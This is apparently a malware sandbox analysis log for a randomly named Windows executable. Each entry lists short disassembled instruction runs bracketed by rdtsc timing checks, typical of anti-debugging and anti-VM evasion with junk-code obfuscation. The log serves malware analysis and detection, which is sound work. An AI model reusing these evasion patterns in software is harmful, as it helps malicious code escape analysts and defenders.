Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E18A0C second address: E18A21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 jmp 00007FF1148823CCh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E18A21 second address: E18A27 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E18A27 second address: E18A4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007FF1148823D8h 0x0000000c jne 00007FF1148823CCh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E19842 second address: E1986B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 jnc 00007FF114F0297Eh 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FF114F02982h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E1986B second address: E1986F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E199AF second address: E199BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jne 00007FF114F02976h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E199BA second address: E199C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 jno 00007FF1148823C6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E199C8 second address: E199DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jne 00007FF114F02976h 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E199DB second address: E199EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 jmp 00007FF1148823CAh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E19CC1 second address: E19CD1 instructions: 0x00000000 rdtsc 0x00000002 js 00007FF114F02976h 0x00000008 jnc 00007FF114F02976h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E19CD1 second address: E19CE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007FF1148823CFh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E1E473 second address: E1E482 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 js 00007FF114F029B0h 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E1E482 second address: E1E486 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E1E486 second address: E1E496 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FF114F02976h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E1E496 second address: E1E4AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF1148823D4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DAC4AD second address: DAC4BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 pushad 0x00000007 js 00007FF114F0297Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DEBCDA second address: DEBCDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DEBCDE second address: DEBCE4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DEBDDC second address: DEBDE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DEBDE0 second address: DEBDEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DEBDEE second address: DEBDF4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DEC16A second address: DEC192 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF114F02986h 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jne 00007FF114F02976h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DEC192 second address: DEC196 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DEC196 second address: DEC19C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DEC430 second address: DEC44B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF1148823CDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jo 00007FF1148823CEh 0x00000010 push ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DEC596 second address: DEC59B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DEC59B second address: DEC5CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF1148823D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push ebx 0x0000000c push esi 0x0000000d ja 00007FF1148823C6h 0x00000013 pop esi 0x00000014 pop ebx 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 push ecx 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FF1148823CAh 0x00000021 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DEC7EB second address: DEC7F5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DEC7F5 second address: DEC7F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DEC7F9 second address: DEC81B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 mov dword ptr [ebp+122D2C8Dh], ecx 0x0000000e push 00000004h 0x00000010 mov edx, dword ptr [ebp+122D285Eh] 0x00000016 mov dword ptr [ebp+122D1ECEh], ecx 0x0000001c nop 0x0000001d push eax 0x0000001e push edx 0x0000001f push edi 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DEC81B second address: DEC820 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DEC820 second address: DEC84C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FF114F02989h 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF114F0297Ah 0x00000013 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DEC84C second address: DEC851 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DECC2B second address: DECC30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DECFF0 second address: DECFF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E1D827 second address: E1D859 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF114F0297Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnc 00007FF114F02995h 0x0000000f jmp 00007FF114F02989h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E1D9CC second address: E1D9EF instructions: 0x00000000 rdtsc 0x00000002 jg 00007FF1148823D2h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e pop eax 0x0000000f jno 00007FF1148823C6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E1D9EF second address: E1D9FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FF114F02976h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E1D9FA second address: E1D9FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E1DE5A second address: E1DE5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E1DE5E second address: E1DE64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E1DFE4 second address: E1DFE8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E1DFE8 second address: E1DFEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E1DFEE second address: E1DFF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E1DFF4 second address: E1DFFD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E217F5 second address: E217FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E217FC second address: E21801 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: D9B9E4 second address: D9B9E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: D9B9E8 second address: D9B9F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: D9B9F1 second address: D9BA02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FF114F02976h 0x0000000a jl 00007FF114F02976h 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: D9BA02 second address: D9BA07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: D9BA07 second address: D9BA40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FF114F02976h 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f ja 00007FF114F0297Eh 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FF114F02988h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: D9BA40 second address: D9BA44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: D9BA44 second address: D9BA5B instructions: 0x00000000 rdtsc 0x00000002 je 00007FF114F02976h 0x00000008 jmp 00007FF114F0297Dh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: D9BA5B second address: D9BA60 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E25FDA second address: E25FE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E26221 second address: E2623E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FF1148823D6h 0x00000008 pop edx 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E26483 second address: E26489 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E26921 second address: E26932 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007FF1148823C6h 0x00000009 jns 00007FF1148823C6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E26E9C second address: E26EA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E258B1 second address: E258D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF1148823D2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d pop edx 0x0000000e js 00007FF1148823CCh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: D9F120 second address: D9F134 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 ja 00007FF114F02976h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jne 00007FF114F02976h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: D9F134 second address: D9F13E instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FF1148823C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: D9F13E second address: D9F144 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E2E1AA second address: E2E1B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E2E1B1 second address: E2E1DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 jl 00007FF114F02976h 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 jl 00007FF114F0298Eh 0x00000017 jo 00007FF114F0297Eh 0x0000001d push edx 0x0000001e pop edx 0x0000001f je 00007FF114F02976h 0x00000025 push eax 0x00000026 pushad 0x00000027 popad 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E2E331 second address: E2E33B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FF1148823C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E2E4A0 second address: E2E4BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FF114F02987h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E30B1A second address: E30B20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E30B20 second address: E30B47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007FF114F02980h 0x0000000a push ebx 0x0000000b jnc 00007FF114F02976h 0x00000011 pop ebx 0x00000012 popad 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 jno 00007FF114F02976h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E30B47 second address: E30B4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E30B4B second address: E30B5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF114F0297Ah 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E35A97 second address: E35AA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 jo 00007FF1148823C6h 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 pop edi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E35AA8 second address: E35AB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FF114F02976h 0x0000000a jns 00007FF114F02976h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E35AB8 second address: E35ABC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E355AE second address: E355B4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E3A1A6 second address: E3A1AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E3A1AE second address: E3A1B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DEC9F7 second address: DECA06 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF1148823C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DECA06 second address: DECA72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 movsx edx, cx 0x0000000a mov ebx, dword ptr [ebp+1248FAE8h] 0x00000010 push 00000000h 0x00000012 push esi 0x00000013 call 00007FF114F02978h 0x00000018 pop esi 0x00000019 mov dword ptr [esp+04h], esi 0x0000001d add dword ptr [esp+04h], 0000001Bh 0x00000025 inc esi 0x00000026 push esi 0x00000027 ret 0x00000028 pop esi 0x00000029 ret 0x0000002a add eax, ebx 0x0000002c push 00000000h 0x0000002e push ecx 0x0000002f call 00007FF114F02978h 0x00000034 pop ecx 0x00000035 mov dword ptr [esp+04h], ecx 0x00000039 add dword ptr [esp+04h], 0000001Ch 0x00000041 inc ecx 0x00000042 push ecx 0x00000043 ret 0x00000044 pop ecx 0x00000045 ret 0x00000046 sub dx, A02Bh 0x0000004b push eax 0x0000004c push eax 0x0000004d push edx 0x0000004e jmp 00007FF114F0297Bh 0x00000053 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DECA72 second address: DECA7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FF1148823C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DECA7C second address: DECADF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF114F02986h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push ebp 0x00000011 call 00007FF114F02978h 0x00000016 pop ebp 0x00000017 mov dword ptr [esp+04h], ebp 0x0000001b add dword ptr [esp+04h], 00000017h 0x00000023 inc ebp 0x00000024 push ebp 0x00000025 ret 0x00000026 pop ebp 0x00000027 ret 0x00000028 mov dword ptr [ebp+1245C5AAh], edx 0x0000002e push 00000004h 0x00000030 mov edx, 5C109EE1h 0x00000035 push eax 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007FF114F02983h 0x0000003f rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DECADF second address: DECAF0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF1148823CDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E3A588 second address: E3A592 instructions: 0x00000000 rdtsc 0x00000002 je 00007FF114F0297Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E3B093 second address: E3B09F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jne 00007FF1148823C6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E3B09F second address: E3B0CC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d jmp 00007FF114F02989h 0x00000012 jns 00007FF114F02976h 0x00000018 pop ecx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E3B0CC second address: E3B0E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF1148823D3h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E3B0E4 second address: E3B0EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E3E304 second address: E3E334 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FF1148823C6h 0x0000000a popad 0x0000000b push ebx 0x0000000c je 00007FF1148823C6h 0x00000012 jmp 00007FF1148823D7h 0x00000017 pop ebx 0x00000018 push eax 0x00000019 push edx 0x0000001a push esi 0x0000001b pop esi 0x0000001c push edx 0x0000001d pop edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: E3E334 second address: E3E344 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF114F0297Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
